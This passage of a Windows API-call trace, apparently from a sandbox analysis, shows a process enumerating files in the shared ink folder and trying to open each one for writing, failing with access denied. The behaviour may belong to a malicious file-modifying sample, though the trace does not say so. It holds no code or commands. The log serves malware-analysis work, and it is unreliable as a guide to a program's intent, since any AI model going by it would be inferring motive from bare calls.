InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6ea48 | out: hHeap=0x20000) returned 1 [0099.778] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.778] AreFileApisANSI () returned 1 [0099.778] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat", lpUsedDefaultChar=0x0) returned 64 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.778] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.778] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d050 [0099.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cee0 [0099.779] AreFileApisANSI () returned 1 [0099.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0099.779] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e030 [0099.779] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 64 [0099.779] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.779] GetFileType (hFile=0x368) returned 0x1 [0099.779] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.779] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.779] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.779] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.780] CloseHandle (hObject=0x368) returned 1 [0099.780] AreFileApisANSI () returned 1 [0099.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 64 [0099.780] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e360 [0099.780] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53640, cbMultiByte=-1, lpWideCharStr=0x6e360, cchWideChar=64 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat") returned 64 [0099.780] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\hwrusash.dat" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\hwrusash.dat"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.780] GetLastError () returned 0x5 [0099.780] GetLastError () returned 0x5 [0099.780] SetLastError (dwErrCode=0x5) [0099.780] GetLastError () returned 0x5 [0099.780] SetLastError (dwErrCode=0x5) [0099.780] GetLastError () returned 0x5 [0099.780] SetLastError (dwErrCode=0x5) [0099.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e360 | out: hHeap=0x20000) returned 1 [0099.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cee0 | out: hHeap=0x20000) returned 1 [0099.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d050 | out: hHeap=0x20000) returned 1 [0099.780] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0099.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.780] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.780] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x58400, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="InkDiv.dll", cAlternateFileName="")) returned 1 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x883b0 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x883b0 | out: hHeap=0x20000) returned 1 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfc0 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35030 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfc0 | out: hHeap=0x20000) returned 1 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35030 | out: hHeap=0x20000) returned 1 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d000 [0099.781] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34fd0 [0099.781] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d000 | out: hHeap=0x20000) returned 1 [0099.823] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34fd0 | out: hHeap=0x20000) returned 1 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887e8 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76020 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88428 [0099.859] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f2c8 [0099.859] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76020 | out: hHeap=0x20000) returned 1 [0099.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88428 | out: hHeap=0x20000) returned 1 [0099.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e2d8 [0099.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f2c8 | out: hHeap=0x20000) returned 1 [0099.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e2d8 | out: hHeap=0x20000) returned 1 [0099.860] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887e8 | out: hHeap=0x20000) returned 1 [0099.860] AreFileApisANSI () returned 1 [0099.860] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll", lpUsedDefaultChar=0x0) returned 62 [0099.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0099.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.860] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.860] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.866] AreFileApisANSI () returned 1 [0099.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.866] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0099.866] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned 62 [0099.866] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.868] GetFileType (hFile=0x368) returned 0x1 [0099.868] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.868] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.868] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.869] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.869] CloseHandle (hObject=0x368) returned 1 [0099.869] AreFileApisANSI () returned 1 [0099.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.869] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e718 [0099.869] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x534d8, cbMultiByte=-1, lpWideCharStr=0x6e718, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll") returned 62 [0099.869] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkDiv.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkdiv.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.869] GetLastError () returned 0x5 [0099.869] GetLastError () returned 0x5 [0099.869] SetLastError (dwErrCode=0x5) [0099.869] GetLastError () returned 0x5 [0099.869] SetLastError (dwErrCode=0x5) [0099.869] GetLastError () returned 0x5 [0099.869] SetLastError (dwErrCode=0x5) [0099.869] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e718 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x534d8 | out: hHeap=0x20000) returned 1 [0099.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.870] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x3e38953f, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0x3e38953f, ftLastAccessTime.dwHighDateTime=0x1d2a02a, ftLastWriteTime.dwLowDateTime=0x3e38953f, ftLastWriteTime.dwHighDateTime=0x1d2a02a, nFileSizeHigh=0x0, nFileSizeLow=0x1ecc00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="InkObj.dll", cAlternateFileName="")) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x885b8 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x886a8 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x885b8 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x886a8 | out: hHeap=0x20000) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x350b0 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x350b0 | out: hHeap=0x20000) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x34ff0 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x34ff0 | out: hHeap=0x20000) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88798 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5fd18 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.870] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x80) returned 0x6e140 [0099.870] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5fd18 | out: hHeap=0x20000) returned 1 [0099.870] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e140 | out: hHeap=0x20000) returned 1 [0099.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88798 | out: hHeap=0x20000) returned 1 [0099.871] AreFileApisANSI () returned 1 [0099.871] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll", cchWideChar=-1, lpMultiByteStr=0x327f67c, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll", lpUsedDefaultChar=0x0) returned 62 [0099.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53760 [0099.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.871] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0099.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d090 [0099.871] AreFileApisANSI () returned 1 [0099.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.871] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e030 [0099.871] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6e030, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned 62 [0099.871] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x327f5a4, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x368 [0099.871] GetFileType (hFile=0x368) returned 0x1 [0099.871] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e030 | out: hHeap=0x20000) returned 1 [0099.871] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f660 | out: lpNewFilePointer=0x0) returned 1 [0099.872] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f614 | out: lpNewFilePointer=0x0) returned 1 [0099.872] SetFilePointerEx (in: hFile=0x368, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x327f62c | out: lpNewFilePointer=0x0) returned 1 [0099.872] CloseHandle (hObject=0x368) returned 1 [0099.872] AreFileApisANSI () returned 1 [0099.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 62 [0099.872] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x7c) returned 0x6e1c8 [0099.872] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x53760, cbMultiByte=-1, lpWideCharStr=0x6e1c8, cchWideChar=62 | out: lpWideCharStr="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll") returned 62 [0099.872] CreateFileW (lpFileName="C:\\Program Files\\Common Files\\microsoft shared\\ink\\InkObj.dll" (normalized: "c:\\program files\\common files\\microsoft shared\\ink\\inkobj.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x327f630, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0099.872] GetLastError () returned 0x5 [0099.872] GetLastError () returned 0x5 [0099.872] SetLastError (dwErrCode=0x5) [0099.872] GetLastError () returned 0x5 [0099.872] SetLastError (dwErrCode=0x5) [0099.872] GetLastError () returned 0x5 [0099.872] SetLastError (dwErrCode=0x5) [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6e1c8 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d090 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53760 | out: hHeap=0x20000) returned 1 [0099.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.873] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.873] FindNextFileW (in: hFindFile=0x780d0, lpFindFileData=0x327f218 | out: lpFindFileData=0x327f218*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x7d14d081, ftCreationTime.dwHighDateTime=0x1d2a02a, ftLastAccessTime.dwLowDateTime=0xe467a929, ftLastAccessTime.dwHighDateTime=0x1d2a058, ftLastWriteTime.dwLowDateTime=0xe467a929, ftLastWriteTime.dwHighDateTime=0x1d2a058, nFileSizeHigh=0x0, nFileSizeLow=0x59a00, dwReserved0=0x327f590, dwReserved1=0x77892bc0, cFileName="InputPersonalization.exe", cAlternateFileName="")) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88450 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dfc0 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88450 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dfc0 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53298 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53490 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53400 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53490 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68c70 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53400 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf90 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35270 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf90 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35270 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d080 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x35190 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x35190 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x70) returned 0x76188 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53838 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa6) returned 0x5f798 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x76188 | out: hHeap=0x20000) returned 1 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0099.873] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0xa0) returned 0x8cae8 [0099.873] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x5f798 | out: hHeap=0x20000) returned 1 [0099.874] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0099.874] InitOnceExecuteOnce (in: 